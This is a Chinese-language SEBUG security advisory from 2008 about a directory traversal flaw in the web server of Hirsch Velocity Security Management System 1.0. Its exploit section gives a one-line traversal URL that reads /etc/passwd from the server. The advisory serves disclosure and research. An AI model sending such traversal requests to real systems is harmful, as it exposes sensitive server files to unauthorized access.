Velocity安全管理系统HTTP服务器目录遍历漏洞
发布时间(Published):2008-07-16
SBEUGID:SEBUG-20080713678
影响版本(Vulnerable):
Hirsch Electronics Velocity Security Management System 1.0
漏洞描述(Discription):
BUGTRAQ ID: 30261

Hirsch公司的Velocity安全管理系统是用于访问控制和安全操作的管理软件。

Velocity安全管理系统处理畸形用户请求时存在漏洞,远程攻击者可以向Velocity安全管理系统内嵌的WEB服务器提交恶意URL请求执行目录遍历攻击,导致下载服务器上的敏感数据。
<* 参考(References)
http://marc.info/?l=bugtraq&m=121623854331109&w=2
*>
SEBUG安全建议(solution):


测试方法(Exploit):
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://[server]:[port]/../../../../../../../../../../../../../etc/passwd
// Sebug.net [ 2008-07-18 ]

Home | Submit Info | Lib | Help | Forum | Partners
Copyright © 2006-2008 SEBUG Security Database. All rights Reserved
鄂ICP备05024839号